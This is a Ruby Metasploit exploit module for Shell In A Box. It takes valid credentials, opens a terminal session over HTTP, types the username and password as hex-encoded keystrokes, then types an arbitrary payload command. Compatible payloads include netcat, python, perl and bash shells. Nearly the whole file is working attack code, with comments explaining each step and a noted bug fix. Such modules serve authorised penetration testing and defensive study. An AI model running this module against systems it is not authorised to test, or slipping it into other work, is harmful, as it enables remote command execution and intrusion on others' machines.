##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
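class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Shell In A Box authenticated command execution.
  #
  # Everything this module does goes through the shellinabox HTTP front end:
  # it obtains a terminal session (#get_session_id), types the configured
  # USERNAME and PASSWORD into that session, then types the payload command.
  # Typed text is sent as upper-case ASCII hex in the +keys+ POST parameter
  # (see #execute_command).
  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'Shell In A Box Authenticated Command Execution',
      'Description' => %q{
        This module uses valid credentials to log in to Shell In A Box and
        execute arbitrary operating system commands. Shell In A Box must be
        configured to use the system shell (default).
      },
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform' => %w{ unix linux },
      'Arch' => ARCH_CMD,
      'Author' =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References' =>
        [
          ['URL', 'http://code.google.com/p/shellinabox/']
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat python perl bash telnet'
            }
        },
      'Targets' =>
        [
          # Tested on Shell In A Box version 2.14
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 12 2012' # Shell In A Box release date
    ))

    register_options(
      [
        Opt::RPORT(4200),
        OptString.new('USERNAME', [true, 'The username for Shell In A Box']),
        OptString.new('PASSWORD', [false, 'The password for Shell In A Box'])
      ], self.class)
  end

  #
  # Check
  #
  # Reports Detected when the target hands out a session ID (i.e. something
  # that behaves like the shellinabox front end answered), Safe otherwise.
  # No command is typed into the session by the check.
  #
  # @return [Exploit::CheckCode]
  def check
    return Exploit::CheckCode::Detected if get_session_id

    vprint_error "#{peer} - Could not get session ID"
    Exploit::CheckCode::Safe
  end

  #
  # Send commands to server as ASCII hex
  #
  # Encodes +cmd+ as two upper-case hex digits per byte, appends a carriage
  # return ('0D') and POSTs the result as the +keys+ parameter of the current
  # @session_id. A nil +cmd+ sends a bare carriage return (this is what
  # happens when PASSWORD is left unset). The follow-up response from
  # #get_response is returned; it is nil when that request failed, so callers
  # must not dereference it blindly.
  #
  # NOTE: with verbose debug output the raw text is echoed to the console,
  # which includes the password when this is called from #exploit.
  #
  # @param cmd [String, nil] text to type into the session
  # @param opts [Hash] unused; kept for interface compatibility
  # @return [Rex::Proto::Http::Response, nil]
  def execute_command(cmd, opts = {})
    hex = cmd.nil? ? '' : cmd.bytes.map { |b| format('%.2X', b) }.join
    req = "#{hex}0D" # '0D' is the carriage return that "presses Enter"

    vprint_debug "#{peer} - Sending request (#{req.length} bytes): #{cmd}"
    res = send_request_cgi(
      'method' => 'POST',
      'vars_post' => Hash[{
        'width' => rand(200),
        'height' => rand(200),
        'session' => @session_id,
        'keys' => req
      }.to_a.shuffle]
    )
    if res.nil?
      print_error "#{peer} - Connection failed"
    elsif res.code == 200 && res.body =~ /<title>OK<\/title>/
      vprint_status "#{peer} - Request sent successfully"
    else
      print_error "#{peer} - Sending request failed"
    end

    # Fetch the terminal output produced by the keystrokes. Guard against a
    # dropped connection here: the original code dereferenced res.body and
    # res.code unconditionally and raised NoMethodError on nil.
    res = get_response
    if res.nil?
      vprint_error "#{peer} - No response received"
    else
      vprint_status "#{peer} - Received response (#{res.body.length} bytes) [HTTP #{res.code}]"
      vprint_debug "#{peer} - Replied: #{res.body}"
    end
    res
  end

  #
  # Retrieve session ID
  #
  # Issues one #get_response request and extracts the first
  # "session":"..." value from the body.
  #
  # @return [String, nil] the session ID, or nil when the connection failed
  #   or the body did not contain one
  def get_session_id
    vprint_status "#{peer} - Fetching session ID..."
    res = get_response

    session_id = nil
    if res.nil?
      vprint_error "#{peer} - Connection failed"
    elsif res.code == 200 && (match = res.body.match(/"session":"(.+?)"/))
      session_id = match[1]
      vprint_status "#{peer} - Found session ID: #{session_id}"
    else
      vprint_error "#{peer} - Could not get session ID"
    end
    session_id
  end

  #
  # Retrieve server response
  #
  # POSTs the current @session_id together with a random width/height pair;
  # the parameter order is shuffled per request. @session_id is still nil
  # when #get_session_id calls this, and the body of that reply is where the
  # session ID is read from.
  #
  # @return [Rex::Proto::Http::Response, nil] nil on connection failure
  def get_response
    send_request_cgi(
      'method' => 'POST',
      'vars_post' => Hash[{
        'width' => rand(200),
        'height' => rand(200),
        'session' => @session_id
      }.to_a.shuffle]
    )
  end

  #
  # Exploit
  #
  # Obtains a session, types USERNAME and PASSWORD (a nil PASSWORD sends only
  # a carriage return), then types the encoded payload command.
  def exploit
    # get session id
    @session_id = get_session_id
    fail_with Exploit::Failure::Unknown, "#{peer} - Could not get session ID." if @session_id.nil?

    # login
    execute_command datastore['USERNAME']
    execute_command datastore['PASSWORD']

    # send payload
    execute_command payload.encoded
  end
end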